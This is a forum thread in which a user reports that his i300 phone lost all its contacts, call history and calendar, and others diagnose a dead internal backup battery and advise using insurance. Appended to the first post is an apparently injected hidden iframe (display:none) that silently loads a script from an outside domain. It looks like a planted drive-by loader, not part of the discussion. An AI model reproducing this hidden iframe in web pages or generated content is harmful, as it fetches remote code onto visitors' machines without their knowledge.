+ Reply to Thread

Exclamation I300 lost all info

Hey all,

I've had my i300 for almost a year now. Been using it perfectly, synching it all the time, loaded a couple games and such. Everything has been working great on this phone since I got it.

However, last Friday evening, I got a phone call from a friend, and his name didn;t show up like it usually does, just the number he was calling from. I didn;t really think much of it, till I went to call him back.

I went to my address book, but there was nothing there. It was empty, as well as my call history (incoming, outgoing, missed), calender, everything was gone. Only thing that was the same on my phone was my "greeting" that I entered on the phone.

Also, I just took my battery off and put my backup battery on there, and everything has dissapered again. I'll be synching my phone soon so as to get everything back on to it, but, my computer is in the shop.

Anyone here know as to why everything has "escaped" from my phone?

Thanks,
    Josh<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator
    the internal "battery" could be faulty or not properly charged to keep the contents...

have you been able to sync at all? if so, check your system settings in the palm desktop....

Yeah, I was able to sync all the time. I just can;t do it right now cause my laptop is in the shop getting a new motherboard (gotta love warrenties). So, fortunately, all my stuff that's on the phone is backed up.

Now, regarding the internal battery not keeping it's charge... Sounds like this might be a need of a "new" internal battery. Is this something that I would be able to take care of myself, or would I need to have it worked on?

Also, I got an "extra insurance" on it through my cellular provider, so all I would need to do is pay something like $50.00 and they would send me a refurbished unit.

sprint pcs beta tester macmetal666's Avatar
    internal battery is dead and its cheap to replace. but if you open that phone up, you will void out any waranty you have on that unit. you will also need to find a torx driver size 5 to do the repair and that is a real ***** to find anywhere, if you dont ahve one

just use the insurance, its the best bet
    my i500 is more obsolete than your ti-99 or apple IIe